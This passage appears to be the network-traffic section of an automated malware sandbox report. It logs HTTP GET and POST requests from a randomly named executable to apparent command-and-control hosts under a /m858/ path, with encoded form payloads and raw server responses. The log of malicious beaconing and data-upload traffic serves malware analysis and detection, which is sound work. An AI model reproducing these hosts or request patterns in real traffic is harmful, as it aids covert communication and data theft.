                                                                                                                      Data Ascii: nRRpS=jlEFtH8z8R0pz28Fgtdf8CatLUcLNNkS1R3iTl5OxABxWUP6UotiA78z8WNTic5hwu5YWu4kYqnFnuQkCd1XtEMN5Tl0qlgg5bY5T7AuOJHZxdKmMsX8Np1NIHzhiY2UWGlhfKFX06hC/W6kxEdYpSl5MB9i+JFDvHWzkL/JGa02MoIuZV6IRPMS9jwOA+Fmg6jt5NpeN11L8umSYUwfG8P9mtyE5hxd+LvZkKFf2Y1SbaUCajOpvzuw+xqVE33A4Fm5BxN0DWi210KM/iEgPpBsM/gSWgQgzPyPii257Gf6FGBivEAimGGcb1GtAOUQ097Qqm3E/rmR0pw6GMMI0IFTZivsVFMKCGx1wIrh2A0LkGqUezE3Z8hhSl6ohw0Imu9tOq22ve6rAst9bGOx64Qk0FOiGOhEWH1Ae+6wHDGaHju2SqxsKC+wIxO2C9haQQUKC0/glIYVE+5CFRZDlzu4XJ5pXuUUwtSeOa1nbLc5iKdjWW053mAR0NF1NM+YziiC7A4crsK4dKj/lcH0S0Ex1TW1pkUnB3txV+AdnQMaloByQmbKTuvPOuYzzGL4mArvjzqGbithQQ5xDPj2JNDT/p/aSn0xYqolMAA8PCVLB8zfeezVTL4ctmWuP0nLzl10cXcW4NOy6A4tSdx73b4B14h+3LmwzG/63PyF5s69znULhEEN4hsksguYzZVmaQCEq//YxsMyqB4O3JDcndB1c6RUF6cYQskar65O3p1Ubg6ODdE+H/CFQM9Dv5JaFFCpS+vOeI66DtQStZheB0yC8DloPZHz9FWoLtu+Hyi04OgP/IvPxqZq6DpdNb0HK5dE8kcFyougn+UB33+2SXnLSi2YR1WQA0VmgyvAPfF6d1xs0DDVIDMDX7FzlRtbldUvkxkFsDixg8zqN/ZNkGbsIioqWFaz4mlZ27OX2l8UGgc79cc8dZmil/m6+eH4A9q6DEKGwIH6eksoKVXWqr+tLN9TmuH/YPB3X/prrkdOB6YSJij0WZSyl3PjWOLNJ4IYtTD86hVU7x8t8luTItyRhikr4I1hSVmCUI/nU1IUUDTaUCnQoQGV8dVyjdAwUB/OEqNt4RIULh5ymGkuysKaa0sHhP5sqE9t/fuTEEtCo4wlmLoI5Ng+nnazlz/6irrlqir0ZvBYlkHLAXlrETLDssBOh5gIKd1pX02iANMLGg3KmMz8mZUKNFEs


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.849752208.91.197.27806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:31.302057028 CET452OUTGET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWoycotxYusBU4lA== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hillcresthealth.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:45:31.915719032 CET312INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:31 GMT
                                                                                                                      Server: Apache
                                                                                                                      Set-Cookie: vsid=919vr449498731383605248; expires=Tue, 05-Dec-2028 12:45:31 GMT; Max-Age=157680000; path=/; domain=www.hillcresthealth.online; HttpOnly
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Connection: close
                                                                                                                      Dec 7, 2023 13:45:31.915802956 CET871INData Raw: 35 32 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                      Data Ascii: 526b<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Wrq0cIZL0aR1wBT0xEA372LBdmsq/SH/SQac5aNmYlguqvZq0OT/uWP6OdTH4RLIYXoyq
                                                                                                                      Dec 7, 2023 13:45:31.915924072 CET1220INData Raw: 20 32 30 3b 0a 7d 0a 23 73 61 6c 65 5f 6c 69 6e 6b 20 61 2c 0a 23 73 61 6c 65 5f 6c 69 6e 6b 5f 62 65 6c 6f 77 20 61 20 7b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 63 6f 6c 6f
                                                                                                                      Data Ascii: 20;}#sale_link a,#sale_link_below a { text-decoration: underline; color: rgb(0,0,0); font-size: 14px;}#sale_link_bold a {font-weight: bold; text-decoration: underline; color: rgb(0,0,0); font-size: 14px;}#sale
                                                                                                                      Dec 7, 2023 13:45:31.915966034 CET1220INData Raw: 0a 23 73 61 6c 65 5f 62 61 6e 6e 65 72 5f 6f 72 61 6e 67 65 5f 77 69 64 65 20 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                                                                                      Data Ascii: #sale_banner_orange_wide a {color: #fff;text-decoration: none;font-weight: bold;}#sale_discreet { background: url('//d38psrni17bvxu.cloudfront.net/themes/sale/sale_simple.png') repeat-x; border-bottom: 1px solid rgb(200,200,2
                                                                                                                      Dec 7, 2023 13:45:31.916003942 CET1220INData Raw: 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 09 63 6f 6c 6f 72 3a 23 30 30 30 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 32 35 62
                                                                                                                      Data Ascii: isplay:block;height:100%;color:#000;text-decoration:none;background: #f25b00;background: -moz-linear-gradient(left, #f25b00 0%, #f49300 47%, #f25b00 100%);background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f2
                                                                                                                      Dec 7, 2023 13:45:31.916039944 CET1220INData Raw: 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 09 09 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 7d 0a 0a 09 23 73 61 6c 65 5f 64 69 61 67
                                                                                                                      Data Ascii: ansform: rotate(45deg);transform: rotate(45deg);color: #fff;}#sale_diagonal_orange span:first-child {padding-top: 5px;}#break {display: block;}}</style> <style media="screen">.asset_star0 {background: url('//d38p
                                                                                                                      Dec 7, 2023 13:45:31.916076899 CET1220INData Raw: 30 3b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d
                                                                                                                      Data Ascii: 0; box-sizing: content-box;}body { text-align: center; font-family: sans-serif; background: #101c36; color: #626574;}.bgHolder { background:#101c36; background-image: url('//d38psrni17bvxu.cloudfront.net/themes/MobileC
                                                                                                                      Dec 7, 2023 13:45:31.916114092 CET1220INData Raw: 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 2e 35 65 6d 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 31 32 35 65 6d 3b 20 67 72
                                                                                                                      Data Ascii: <div style="padding-bottom: .5em; padding-top: .5em; border-radius: .125em; grid-template-columns: 1fr 1fr 1fr; display: inline-grid"> <div style="grid-column: 1 / span 1; grid-row-start: 1; grid-row-end: span 2; justify-self: start; a
                                                                                                                      Dec 7, 2023 13:45:31.965487957 CET1220INData Raw: 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69
                                                                                                                      Data Ascii: ; width: 900px; max-width:96%; margin: 0 auto; z-index: 20; } .sale_link a { text-decoration: underline; color: rgb(0,0,0); font-size: 14px; } .sale_link a:hover {
                                                                                                                      Dec 7, 2023 13:45:32.073911905 CET1220INData Raw: 2f 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20 27 74 63 27 2c 0a 20 20 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 72 65 6c 61 74 65 64 73 65 61 72 63 68 27 2c
                                                                                                                      Data Ascii: // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14,
                                                                                                                      Dec 7, 2023 13:45:32.073960066 CET1220INData Raw: 20 20 20 20 20 76 61 72 20 61 64 74 65 73 74 3d 27 6f 66 66 27 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 69 66 28 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 21 3d 3d 6c
                                                                                                                      Data Ascii: var adtest='off'; </script><script type="text/javascript">if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=ZGY3MDExNzI


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.849753144.217.103.3806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:45.826437950 CET700OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 69 57 39 67 47 33 51 41 75 61 56 48 49 73 63 38 63 6f 73 73 62 73 58 35 43 68 32 72 63 78 71 58 7a 61 6c 6e 41 4e 35 46 2b 52 72 72 38 38 35 75 74 6b 32 6d 64 33 58 68 43 58 52 32 6a 61 32 43 77 67 45 2f 54 62 73 33 43 63 71 75 65 4e 58 53 6c 33 4d 69 42 46 45 42 6e 35 53 62 52 6c 78 4b 6e 65 45 30 4b 63 65 69 32 4f 45 7a 6d 68 41 62 62 50 76 34 50 68 4b 37 4f 66 4d 6f 33 4d 59 79 72 43 63 6c 38 61 77 30 58 32 79 33 72 73 76 43 30 53 71 65 58 52 2b 59 4d 65 33 41 77 50 77 44 61 78 63 2b 57 64 44 35 78 34 48 32 69 63 31 37 46 77 3d 3d
                                                                                                                      Data Ascii: nRRpS=iW9gG3QAuaVHIsc8cossbsX5Ch2rcxqXzalnAN5F+Rrr885utk2md3XhCXR2ja2CwgE/Tbs3CcqueNXSl3MiBFEBn5SbRlxKneE0Kcei2OEzmhAbbPv4PhK7OfMo3MYyrCcl8aw0X2y3rsvC0SqeXR+YMe3AwPwDaxc+WdD5x4H2ic17Fw==
                                                                                                                      Dec 7, 2023 13:45:46.129869938 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.849754144.217.103.3806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:48.517329931 CET720OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 69 57 39 67 47 33 51 41 75 61 56 48 4b 4d 73 38 50 5a 73 73 58 63 58 36 4a 42 32 72 53 52 71 62 7a 61 70 6e 41 4f 31 56 2f 6a 50 72 2f 59 78 75 75 6d 4f 6d 59 33 58 68 4b 33 51 2b 2b 71 32 4a 77 68 34 42 54 61 38 33 43 63 75 75 65 50 2f 53 6c 45 6b 68 41 56 45 48 75 5a 53 5a 50 56 78 4b 6e 65 45 30 4b 63 62 4e 32 4f 4d 7a 6e 52 77 62 62 75 76 37 4d 68 4b 34 4a 66 4d 6f 38 73 59 32 72 43 63 4c 38 66 56 6a 58 30 4b 33 72 75 33 43 30 47 32 66 5a 68 2b 61 52 75 32 43 2f 4e 35 70 55 68 78 41 5a 74 50 54 74 50 75 37 75 70 5a 6f 43 48 53 7a 52 2b 4b 49 6b 4f 4f 62 4e 2f 58 70 4e 74 76 54 67 51 6b 3d
                                                                                                                      Data Ascii: nRRpS=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jPr/YxuumOmY3XhK3Q++q2Jwh4BTa83CcuueP/SlEkhAVEHuZSZPVxKneE0KcbN2OMznRwbbuv7MhK4JfMo8sY2rCcL8fVjX0K3ru3C0G2fZh+aRu2C/N5pUhxAZtPTtPu7upZoCHSzR+KIkOObN/XpNtvTgQk=
                                                                                                                      Dec 7, 2023 13:45:48.699510098 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:47 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.849755144.217.103.3806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:45:51.204389095 CET1733OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 69 57 39 67 47 33 51 41 75 61 56 48 4b 4d 73 38 50 5a 73 73 58 63 58 36 4a 42 32 72 53 52 71 62 7a 61 70 6e 41 4f 31 56 2f 6a 48 72 38 71 70 75 74 42 61 6d 62 33 58 68 4c 33 51 39 2b 71 32 75 77 67 51 64 54 61 77 4e 43 65 6d 75 4d 63 48 53 6a 31 6b 68 4a 56 45 48 6a 35 53 55 52 6c 78 6c 6e 65 55 77 4b 63 72 4e 32 4f 4d 7a 6e 53 6f 62 5a 2f 76 37 4b 68 4b 37 4f 66 4d 73 33 4d 59 65 72 43 30 39 38 65 55 65 51 45 71 33 72 4f 6e 43 79 31 65 66 62 42 2b 63 51 75 32 67 2f 4e 6c 79 55 68 63 73 5a 74 4c 74 74 49 4b 37 69 75 55 38 42 6c 6e 6b 4d 4f 53 6c 6c 4e 79 44 50 75 75 49 4a 4e 76 69 33 56 72 31 4e 71 66 79 37 75 46 71 65 4c 6b 52 7a 33 6b 41 6c 74 56 7a 77 44 67 77 68 58 57 35 38 65 47 54 35 49 48 43 70 30 6a 49 54 57 57 4c 41 70 41 6f 4e 51 66 6b 54 71 4d 6c 7a 70 6a 48 36 6c 62 68 62 77 39 55 31 4a 59 34 76 6a 73 34 33 67 41 34 6e 65 38 79 7a 77 68 55 54 38 66 46 76 49 43 6f 6b 33 72 4d 53 6f 46 78 51 46 45 78 39 4a 54 4a 6d 31 62 7a 4b 32 72 35 4a 76 77 68 73 67 4a 52 6e 48 42 38 62 61 36 30 46 48 66 6d 68 4d 74 78 75 79 4e 31 6a 64 34 59 32 52 30 54 62 78 56 57 73 2b 71 6f 65 55 55 79 50 44 66 6b 43 75 66 46 43 49 63 68 4b 32 70 6e 75 34 50 71 58 4f 75 62 39 51 63 32 47 75 49 67 46 6b 6d 59 34 34 6a 61 32 36 74 6c 61 4d 78 51 38 67 49 34 69 64 32 62 49 52 69 45 75 38 30 46 32 78 62 58 64 49 62 33 69 33 4b 49 4f 65 6c 43 65 72 61 59 69 35 39 47 30 42 6a 78 44 35 64 55 79 73 62 4c 56 6e 69 6a 62 7a 66 46 79 50 76 4a 78 59 47 31 48 6d 51 4e 63 34 32 32 49 6f 44 47 65 5a 2b 2b 4f 77 74 31 65 43 41 50 6d 53 46 34 57 6e 78 30 7a 5a 37 52 33 6c 68 52 51 4d 49 5a 59 6e 55 69 51 51 2f 44 43 56 31 37 78 2b 32 79 31 42 34 61 63 4a 54 4b 56 53 74 38 6f 34 6d 6e 6c 41 68 57 65 6e 6c 66 64 43 4c 36 70 68 73 6b 37 66 63 4e 4f 70 4b 36 43 67 70 78 4d 31 75 72 59 44 56 49 64 73 68 34 4a 44 50 71 34 6a 6f 69 52 73 56 62 41 59 62 75 46 47 57 50 46 32 52 6b 4b 4c 32 49 73 71 6d 33 65 71 50 48 38 51 4c 35 61 6e 7a 78 5a 61 78 69 69 58 65 42 57 71 79 2f 6a 6b 50 6f 42 56 61 48 32 68 4b 37 4b 77 4c 75 79 5a 4c 68 34 70 69 35 6d 35 6a 52 6d 58 76 6e 33 33 64 69 75 4e 6b 5a 59 34 7a 31 71 79 68 70 55 42 2f 73 70 67 56 72 37 34 77 38 78 34 68 50 50 70 72 41 6d 4f 55 62 64 35 4a 7a 49 56 69 65 4a 76 30 68 62 57 65 5a 58 46 4d 78 2b 74 36 53 61 6b 5a 46 74 2f 45 41 46 31 37 4d 6e 4a 50 4f 54 6a 31 57 47 78 54 56 30 5a 48 6c 4a 52 30 59 64 70 62 4f 4e 73 79 6f 70 44 41 37 69 6d 41 7a 67 39 53 51 6c 52 66 70 44 6e 53 71 32 31 51 64 37 42 45 4c 30 6c 56 34 30 69 6e 55 79 52 4f 34 6e 78 43 59 75 68 50 73 37 46 50 5a 38 6a 70 6a 36 6a 2b 53 71 50 4b 31 71 41 43 37 47 5a 59 79 64 38 52 69 45 66 56 64 61 58 66 45 4c 32 41 57 7a 55 36 75 77 77 35 73 63 79 69 6b 4d 68 42 75 67 42 52 46 72 68 37 59 61 38 4a 43 4f 51 35 57 47 33 49 42 4f 6f 68 32 39 4c 78 4e 72 51 63 53 49 64 52 52 42 56 66 4b 48 75 7a 53 38 59 79 47 58 72 76 6d 67 65 74 63 35 64 7a 56 39 68 72 62 37 56 6c 4a 42 47 4f 42 73 73 74 54 46 7a 52 4f 4b 75 56 34 34 34 33 47 33 55 67 46 59 46 66 50 45 47 39 4f 44 64 71 36 33 54 73 32 70 69 78 79 2f 61 44 31 49 75 33 64 5a 4c 6b 71 68 38 71 4d 2f 7a 6a 30 75 50 48 66 54 2f 5a 67 4c 75 64 38 6d 44 47 69 2b 4b 55 54 79 71 72 6d 72 32 33 51 38 6c 72 32 31 73 65 57 43 32 57 4e 59 45 61 4b 50 46 2b 68 51 37 58 38 30 53 58 73 7a 6d 66 6c 61 61 66 6a 6f 6d 72 61 58 30 32 78 75 39 49 52 35 62 79 6f 33 73 6b 75 62 73 54 62 44 56 45 54 57 76 4f 37 6a 6a 30 42 55 76 52 54 75 59 34 65 4b 2b 48 61 2f 43 68 74 2b 64 64 7a 32 6a 53 61 7a 39 38 46 62 79 4b 46 37 78 7a 73 6b 71 6b 64 35 70 65 32 47 6f 73 6a 34 39 46 75 6c 4c 51 38 76 39 74 6c 69 4c 49 39 69 71 47 50 63 4b 4d 47 49 55 44 46 57 46 75 70 4b 52 5a 61
                                                                                                                      Data Ascii: nRRpS=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jHr8qputBamb3XhL3Q9+q2uwgQdTawNCemuMcHSj1khJVEHj5SURlxlneUwKcrN2OMznSobZ/v7KhK7OfMs3MYerC098eUeQEq3rOnCy1efbB+cQu2g/NlyUhcsZtLttIK7iuU8BlnkMOSllNyDPuuIJNvi3Vr1Nqfy7uFqeLkRz3kAltVzwDgwhXW58eGT5IHCp0jITWWLApAoNQfkTqMlzpjH6lbhbw9U1JY4vjs43gA4ne8yzwhUT8fFvICok3rMSoFxQFEx9JTJm1bzK2r5JvwhsgJRnHB8ba60FHfmhMtxuyN1jd4Y2R0TbxVWs+qoeUUyPDfkCufFCIchK2pnu4PqXOub9Qc2GuIgFkmY44ja26tlaMxQ8gI4id2bIRiEu80F2xbXdIb3i3KIOelCeraYi59G0BjxD5dUysbLVnijbzfFyPvJxYG1HmQNc422IoDGeZ++Owt1eCAPmSF4Wnx0zZ7R3lhRQMIZYnUiQQ/DCV17x+2y1B4acJTKVSt8o4mnlAhWenlfdCL6phsk7fcNOpK6CgpxM1urYDVIdsh4JDPq4joiRsVbAYbuFGWPF2RkKL2Isqm3eqPH8QL5anzxZaxiiXeBWqy/jkPoBVaH2hK7KwLuyZLh4pi5m5jRmXvn33diuNkZY4z1qyhpUB/spgVr74w8x4hPPprAmOUbd5JzIVieJv0hbWeZXFMx+t6SakZFt/EAF17MnJPOTj1WGxTV0ZHlJR0YdpbONsyopDA7imAzg9SQlRfpDnSq21Qd7BEL0lV40inUyRO4nxCYuhPs7FPZ8jpj6j+SqPK1qAC7GZYyd8RiEfVdaXfEL2AWzU6uww5scyikMhBugBRFrh7Ya8JCOQ5WG3IBOoh29LxNrQcSIdRRBVfKHuzS8YyGXrvmgetc5dzV9hrb7VlJBGOBsstTFzROKuV4443G3UgFYFfPEG9ODdq63Ts2pixy/aD1Iu3dZLkqh8qM/zj0uPHfT/ZgLud8mDGi+KUTyqrmr23Q8lr21seWC2WNYEaKPF+hQ7X80SXszmflaafjomraX02xu9IR5byo3skubsTbDVETWvO7jj0BUvRTuY4eK+Ha/Cht+ddz2jSaz98FbyKF7xzskqkd5pe2Gosj49FulLQ8v9tliLI9iqGPcKMGIUDFWFupKRZa
                                                                                                                      Dec 7, 2023 13:45:51.386885881 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:50 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
